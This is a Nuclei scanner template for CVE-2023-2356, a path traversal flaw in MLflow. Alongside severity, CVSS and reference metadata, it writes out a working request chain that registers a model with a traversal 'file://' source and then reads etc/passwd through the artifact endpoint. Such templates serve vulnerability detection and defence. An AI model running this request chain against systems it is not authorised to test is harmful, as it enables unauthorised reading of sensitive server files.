id: CVE-2023-2356 info: name: Mlflow <2.3.0 - Local File Inclusion author: Co5mos severity: high description: | Relative Path Traversal in GitHub repository mlflow/mlflow prior to 2.3.1. impact: | Successful exploitation could allow an attacker to read sensitive files on the server. remediation: | Upgrade Mlflow to version 2.3.0 or above to mitigate the vulnerability. reference: - https://huntr.dev/bounties/7b5d130d-38eb-4133-8c7d-0dfc9a9d9896/ - https://nvd.nist.gov/vuln/detail/CVE-2023-2356 - https://github.com/mlflow/mlflow/commit/f73147496e05c09a8b83d95fb4f1bf86696c6342 - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-2356 cwe-id: CWE-23 epss-score: 0.00875 epss-percentile: 0.82072 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" fofa-query: app="MLflow" tags: cve2023,cve,lfi,huntr,mlflow,oss,intrusive,lfprojects variables: str: "{{rand_base(6)}}" http: - raw: - | POST /api/2.0/mlflow/registered-models/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}"} - | POST /api/2.0/mlflow/model-versions/create HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"name": "{{str}}", "source": "file://{{Hostname}}/../../../../../../../"} - | GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: regex regex: - root:[x*]:0:0 - type: status status: - 200 extractors: - type: regex name: version group: 1 regex: - '"version": "([0-9.]+)",' internal: true part: body # digest: 4a0a0047304502201dc691af618aeb7ae1784f119f04c2ae83a05a8b759601debe738dd5c11308e1022100a5df5635703f52bc26e0ed9760ccc09d6f92a23a35e8c13c9b272a203d54b34a:922c64590222798bb761d5b6d8e72950